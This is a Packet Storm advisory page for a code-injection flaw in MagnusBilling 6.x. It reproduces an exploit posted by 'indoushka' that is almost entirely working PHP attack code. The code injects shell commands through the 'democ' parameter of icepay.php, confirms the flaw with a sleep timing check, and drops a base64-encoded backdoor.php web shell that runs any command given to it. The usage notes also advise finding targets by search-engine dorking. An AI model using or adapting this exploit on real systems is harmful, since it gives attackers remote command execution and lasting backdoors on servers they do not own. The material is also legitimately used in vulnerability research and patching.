Security
Headlines
HeadlinesLatestCVEs

Headline

MagnusBilling 6.x Code Injection

MagnusBilling version 6.x suffers from a PHP code injection vulnerability.

Packet Storm
#vulnerability#web#windows#google#php#backdoor#auth#firefox

=============================================================================================================================================
| # Title : MagnusBilling 6.x Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.magnusbilling.org/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class MagnusBillingExploit {
private $targetUri;
private $webShellName;

public function __construct($targetUri) {  
    $this->targetUri = $targetUri;  
}

// Function to execute commands on the target  
public function executeCommand($cmd) {  
    $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
    return file_get_contents($url); // Send HTTP request  
}

// Function to execute PHP code on the target  
public function executePhp($cmd) {  
    $payload = base64_encode($cmd);  
    $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
    $postFields = [$this->postParam => $payload];  
    return $this->sendPostRequest($url, $postFields); // Send POST request  
}

// Upload backdoor webshell to the target  
public function uploadBackdoorWebShell() {  
    // Name of the webshell to be uploaded  
    $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

    // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
    $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

    // Encode the webshell content  
    $encodedPayload = base64_encode($backdoorCode);

    // Construct the command to upload the backdoor  
    $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

    // Execute the command to upload the backdoor  
    return $this->executeCommand($cmd);  
}

// Check if the target can be exploited  
public function check() {  
    $url = $this->targetUri;  
    $response = file_get_contents($url);  
    if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
        return "Safe: Likely not a MagnusBilling application.";  
    }

    $sleepTime = rand(4, 8);  
    $this->executeCommand("sleep {$sleepTime}");  
    sleep($sleepTime); // Simulate blind command injection

    return "Vulnerable: Command injection successful.";  
}

// Main function to exploit the target  
public function exploit() {  
    echo "Uploading backdoor...\n";  
    $result = $this->uploadBackdoorWebShell();  
    if (!$result) {  
        die("Backdoor upload failed.");  
    }  
    echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
}

// Helper function to send POST requests  
private function sendPostRequest($url, $postFields) {  
    $options = [  
        'http' => [  
            'method' => 'POST',  
            'header' => 'Content-Type: application/x-www-form-urlencoded',  
            'content' => http_build_query($postFields)  
        ]  
    ];  
    $context = stream_context_create($options);  
    return file_get_contents($url, false, $context);  
}  

}

// Usage example
$exploit = new MagnusBillingExploit(‘http://target-url/mbilling’);
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution